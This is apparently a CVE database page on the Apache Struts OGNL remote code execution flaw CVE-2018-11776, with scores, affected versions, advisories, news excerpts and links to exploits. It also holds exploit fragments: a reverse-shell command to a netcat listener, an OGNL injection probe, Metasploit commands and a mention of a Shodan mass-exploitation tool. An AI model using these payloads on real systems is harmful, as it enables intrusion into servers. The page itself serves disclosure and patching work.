9.3
HIGH

CVE-2018-11776

Published: 22/08/2018 Updated: 16/01/2019
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.1 | Impact Score: 5.9 | Exploitability Score: 2.2

Vulnerability Summary

Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts

Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.

A vulnerability in Apache Struts could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. The vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of url tags with no value or action. In cases where upper actions or configurations also have no namespace or a wildcard namespace, an attacker could exploit this vulnerability by sending a request that submits malicious input to the affected application for processing. If successful, the attacker could execute arbitrary code in the security context of the affected application on the targeted system. The Apache Software Foundation has confirmed the vulnerability and released software updates.

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Access Complexity: MEDIUM
Authentication: NONE
Access Vector: NETWORK
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE

Vulnerability Trend

Affected Products

Vendor Product Versions
ApacheStruts2.3.1, 2.3.1.1, 2.3.1.2, 2.3.3, 2.3.4, 2.3.4.1, 2.3.5, 2.3.6, 2.3.7, 2.3.8, 2.3.9, 2.3.10, 2.3.11, 2.3.12, 2.3.13, 2.3.14, 2.3.14.1, 2.3.14.2, 2.3.14.3, 2.3.15, 2.3.15.1, 2.3.15.2, 2.3.15.3, 2.3.16, 2.3.16.1, 2.3.16.2, 2.3.16.3, 2.3.17, 2.3.19, 2.3.20, 2.3.20.1, 2.3.20.2, 2.3.20.3, 2.3.21, 2.3.22, 2.3.23, 2.3.24, 2.3.24.2, 2.3.24.3, 2.3.25, 2.3.26, 2.3.27, 2.3.28, 2.3.28.1, 2.3.29, 2.3.30, 2.3.31, 2.3.32, 2.3.33, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.5.6, 2.5.7, 2.5.8, 2.5.9, 2.5.10, 2.5.11, 2.5.13, 2.5.14, 2.5.14.1, 2.5.15, 2.5.16

Vendor Advisories

Apache Struts versions 23 to 2334 and 25 to 2516 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when usin ...
A vulnerability in Apache Struts could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system The vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of url tags with no value or action In cases where up ...
There is a vulnerability in Apache Struts which the IBM FlashSystem™ V840 is susceptible An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system ...
A vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM Spectrum Virtualize Software, IBM Spectrum Virtualize for Public Cloud and IBM FlashSystem V9000 and V9100 products Apache Struts is used in the Service Assistant GUI The Service Assistant CLI is unaffected ...
There is a vulnerability in Apache Struts which the IBM FlashSystem™ 840 and 900 are susceptible An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system ...
Oracle Security Alert Advisory - CVE-2018-11776 Description This Security Alert addresses CVE-2018-11776, a vulnerability in Apache Struts 2 CVE-2018-11776 has received a CVSS v3 base score of 98 When the alwaysSelectFullNamespace option is enabled in a Struts 2 ...
Oracle Critical Patch Update Advisory - January 2019 Description A Critical Patch Update is a collection of patches for multiple security vulnerabilities Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added ...
Oracle Critical Patch Update Advisory - October 2018 Description A Critical Patch Update is a collection of patches for multiple security vulnerabilities Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previou ...

Exploits

#!/usr/bin/python # -*- coding: utf-8 -*- # hook-s3c (githubcom/hook-s3c), @hook_s3c on twitter import sys import urllib import urllib2 import httplib def exploit(host,cmd): print "[Execute]: {}"format(cmd) ognl_payload = "${" ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)" ognl_payload += "(#cmd='{}')"f ...
#!/usr/bin/env python3 # coding=utf-8 # ***************************************************** # struts-pwn: Apache Struts CVE-2018-11776 Exploit # Author: # Mazin Ahmed <Mazin AT MazinAhmed DOT net> # This code uses a payload from: # githubcom/jas502n/St2-057 # ***************************************************** import argparse im ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE # Eschewing CmdStager for now, since the use of '\' and ';' a ...

Mailing Lists

Apache versions 23 up to 2334 and 25 up to 2516 remote code execution exploit ...
This Metasploit module exploits a remote code execution vulnerability in Apache Struts versions 23 through 234, and 25 through 2516 Remote code execution can be performed via an endpoint that makes use of a redirect action Native payloads will be converted to executables and dropped in the server's temp dir If this fails, try a cmd/* paylo ...
[CVEID]:CVE-2018-11776 [PRODUCT]:Apache Struts [VERSION]:Apache Struts 23 to 2334 and 25 to 2516 [PROBLEMTYPE]:Remote Code Execution [REFERENCES]:cwikiapacheorg/confluence/display/WW/S2-057 [DESCRIPTION]:Man Yue Mo from the Semmle Security Research team was noticed that Apache Struts versions 23 to 2334 and 25 to 2516 suffer f ...

Metasploit Modules

Apache Struts 2 Namespace Redirect OGNL Injection

This module exploits a remote code execution vulnerability in Apache Struts version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed via an endpoint that makes use of a redirect action. Note that this exploit is dependant on the version of Tomcat running on the target. Versions of Tomcat starting with 7.0.88 currently don't support payloads larger than ~7.5kb. Windows Meterpreter sessions on Tomcat >=7.0.88 are currently not supported. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.

msf > use exploit/multi/http/struts2_namespace_ognl
      msf exploit(struts2_namespace_ognl) > show targets
            ...targets...
      msf exploit(struts2_namespace_ognl) > set TARGET <target-id>
      msf exploit(struts2_namespace_ognl) > show options
            ...show and set options...
      msf exploit(struts2_namespace_ognl) > exploit

Github Repositories

CVE-2018-11776 Docker container and POC exploit written in Go You can build your own image and run it: docker build -t your_image_name docker container run -it --rm -p 8080:8080 your_image_name Or you just can pull the one I created with love for you: docker container run -it --rm -p 8080:8080 tuxotron/cve-2018-11776 Vulnerable application running on port 8080 To try the ex

CVE-2018-11776 Environment for CVE-2018-11776 / S2-057 Demo Run server $ docker run -d --hostname struts2 --name cve-2018-11776 -p 30080:8080 knqyf263/cve-2018-11776 Exploit $ nc -l 10000 (or nc -lp 10000) $ python3 exploitpy localhost:30080 'bash -i &gt;&amp; /dev/tcp/192168331/10000 0&gt;&amp;1'

struts-pwn - CVE-2018-11776 Exploit An exploit for Apache Struts CVE-2018-11776 Usage Check if the vulnerability exists against a single URL python struts-pwnpy --url 'examplecom/demo/struts2-showcase/indexaction' Check if the vulnerability exists against a list of URLs python struts-pwnpy --list 'urlstxt' Exploit a single URL python struts-pw

Vulnerable docker container for CVE-2018-11776 # docker pull bhdresh/cve-2018-11776:10 # docker run -dit -p &lt;IP ADDRESS&gt;:8080:8080 bhdresh/cve-2018-11776:10 PoC PoC - 1 Request : &lt;IP ADDRESS&gt;:8080/struts2-showcase-2314/${333+333}/helpaction Result : &lt;IP ADDRESS&gt;:8080/struts2-showcase-2314/666/helpaction PoC - 2

CVE-2018-11776 This is part of Cved: a tool to manage vulnerable docker containers Cved: gitlabcom/git-rep/cved Image source: githubcom/cved-sources/cve-2018-11776 Image author: githubcom/knqyf263/CVE-2018-11776

CVE-2018-11776 2018年8月23日,Apache Strust2发布最新安全公告,Apache Struts2 存在远程代码执行的高危漏洞,该漏洞由Semmle Security Research team的安全研究员汇报,漏洞编号为CVE-2018-11776(S2-057)。Struts2在XML配置中如果namespace值未设置且(Action Configuration)中未设置或用通配符namespace时可能会导致远

CVE靶场快速搭建 使用方式 $ git clone githubcom/white3/Cvekergit 进入需要进行实验的CVE目录下 $ docker-compose up -d 详细使用请看改CVE下的README文件。 已有CVE CVE编号 标题 CVE-2018-11776 S2-057远程代码执行

APACHE STRUTS SHODAN EXPLOIT POC Author: @037 Original code can be found here This tool takes advantage of CVE-2018-11776 and Shodan to perform mass exploitation of verified and vulnerable Apache Struts servers Shodan search parameter has been left out to weed out any skids trying to use this tool for malicious reasons This tool is created to be treated as a proof of conce

S2-057-CVE-2018-11776 A simple exploit for Apache Struts RCE S2-057 (CVE-2018-11776) IMPORTANT: Is provided only for educational or information purposes Deploy test environment git clone githubcom/vulhub/vulhub cd vulhub/struts2/s2-057 docker-compose up -d Usage exploitpy &lt;url&gt; &lt;command&gt; &lt;action&gt; &lt;payload&gt; Exam

Strutter Proof of Concept for CVE-2018-11776, comes complete with the ability to search Shodan API for targets CVE-2018-11776 Apache Struts versions 23 to 2334 and 25 to 2516 suffer from possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace Same possibility when using url tag which doesn&#

CVE-2018-11776-Python-PoC hook-s3c (githubcom/hook-s3c), @hook_s3c on twitter Working Python test and PoC for CVE-2018-11776, originally appearing on; githubcom/hook-s3c/CVE-2018-11776-Python-PoC What's going on? Man Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request Versions affected are 2

Mitaka Mitaka is an OSINT friendly Chrome extension which can: Extract &amp; refang IoC from a block of text Eg example[]com to examplecom Search / scan it on various engines Eg VirusTotal, urlscanio, Censys, Shodan, etc Features Supported IOC types name desc eg text freetext any string(s) ip IPv4 address 8888 domain domain name github

St2-057 在线靶机环境,Enjoy! 0x01 搭建环境docker githubcom/vulhub/vulhub/tree/master/struts2/s2-048 docker-compose up -d 0x02 搭建st2-057漏洞环境 docker exec -i -t 88fd8d560155 /bin/bash 后台启动进入docker 根据公告 strutsapacheorg/releaseshtml Release Release Date Vulnerability Version Notes Struts 2516 16 March 2018 S2-057

CVE-2018-11776 Proof of Concept exploit so I could quickly assess what sorts of protections and fixes are available Originally found by Man Yue Mo, Semmle: semmlecom/news/apache-struts-CVE-2018-11776 Semmle had a "Apache Struts RCE - CVE-2018-11776 - PoC Exploit Demo" YouTube video up for a bit, but I believe it's gone or, at least, no longer linked to

CVE-2018-11776 (S2-057) [*] Usage: S2-057jar &lt;url&gt; &lt;action&gt; &lt;command&gt; &lt;payload (1-5)&gt; [*] Example: S2-057jar "examplecom/struts2-showcase/" "/actionChain1action" "whoami" 4

Struts2-057/CVE-2018-11776两个版本RCE漏洞分析(含EXP) Ivan@360云影实验室 2018年08月24日 0x01 前言 2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞(S2-057/CVE-2018-11776),该漏洞由Semmle Security Research team的安全研究员Man YueMo发现。该漏洞是由于在Struts2开发框架

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php Funcion Terminada :) jsp Funcion en desarrollo CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:�

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php Funcion Terminada :) jsp Funcion en desarrollo CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:�

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php terminado jsp proceso CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:' and 'redirectAction

WsylibBookRS 主要内容: 解决目前学校图书管理系统不能由学生推荐图书到图书馆的问题,经过使用测试,符合生产使用环境 使用技术 spring 4318 spring jdbc 4318 struts 2518 mysql 57 开发环境 eclipse    maven 35 建议及其pull 如果你对本项目感兴趣,请动一动的你尊贵的小手,fork一下

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php Funcion Terminada :) jsp Funcion en desarrollo CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:�

CVE-exploits This repository is a collections of CVE exploits

ActiveScan++ ActiveScan++ extends Burp Suite's active and passive scanning capabilities Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers: Potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding) Edge Side Includes XML input handling Suspicious input transformation (eg

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intrude

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

raw:: html image:: /pictures/logopng raw:: html image:: imgshieldsio/badge/python-36-bluesvg :target: wwwpythonorg/downloads/release/python-366/ :alt: Python 36 image:: readthedocsorg/projects/jok3r/badge/?version=latest :target: jok3rreadthedocsio/en/latest/ :alt: Documentation ReadTheDocs image:: im

CVE-MyLife CVE in My Life!

Jok3r - Network and Web Pentest Framework Jok3r is a Python3 CLI application which is aimed at helping penetration testers for network infrastructure and web black-box security tests Its main goal is to save time on everything that can be automated during network/web pentest in order to enjoy more time on more interesting and challenging stuff To achieve that, it combines ope

Awesome CVE PoC A curated list of CVE PoCs Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out awesome-web-security Please read the contribution guidelines before contributing This repo is full of PoCs for CVEs If you enjoy this awesome list and would like to support it, check out my Patreon page :

Recent Articles

Thought Patch Tuesday was a load? You gotta check out this Oracle mega-advisory, then
The Register • Shaun Nichols in San Francisco • 16 Oct 2018

And you'll definitely want to check out the libssh flaw

Oracle has released a wide-ranging security update to address more than 300 CVE-listed vulnerabilities in its various enterprise products.
The October release covers the gamut of Oracle's offerings, including its flagship Database, E-Business Suite, and Fusion Middleware packages.
For Database, the update addresses a total of three flaws. Two of the vulnerabilities (CVE-2018-3259 and CVE-2018-3299) can be remotely exploited without authentication, while the third, CVE-2018-7489, woul...

Hackers latch onto new Apache Struts megavuln to mine cryptocurrency
The Register • John Leyden • 30 Aug 2018

Underground forums alight with Struts chat, we hear

A recently uncovered critical vulnerability in Apache Struts is already being exploited in the wild.
Threat intel firm Volexity has warned that hackers are abusing the CVE-2018-11776 vuln to attack systems running Apache Struts 2, a popular open-source framework for developing applications in Java. Specifically, some nasty characters have abused the flaw while trying to install the CNRig cryptocurrency miner, researchers said.
The vulnerability appears to be easier to exploit than th...

PoC targeting critical Apache Struts bug found online
welivesecurity • Tomáš Foltýn • 28 Aug 2018

Researchers have discovered freely available proof-of-concept (PoC) code that can be used to exploit a critical security hole in the Apache Struts 2 web application framework shortly after the vulnerability was disclosed and the patch was released.
The PoC, “including a Python script that allows for easy exploitation”, was found by threat intelligence company Recorded Future on the software development platform GitHub. The firm also said that it has spotted chatter on underground forum...

Apache's latest SNAFU – Struts normal, all fscked up: Web app framework needs urgent patching
The Register • Kieren McCarthy in San Francisco • 22 Aug 2018

Paging Equifax: Time to update again, fellas

Another critical security hole has been found in Apache Struts 2, requiring an immediate update.
The vulnerability – CVE-2018-11776 – affects core code and allows miscreants to pull off remote code execution against vulnerable servers and websites. It affects all versions of Struts 2, the popular open-source framework for Java web apps.
The Apache Software Foundation has "urgently advised" anyone using Struts to update to the latest version immediately, noting that the last time ...

References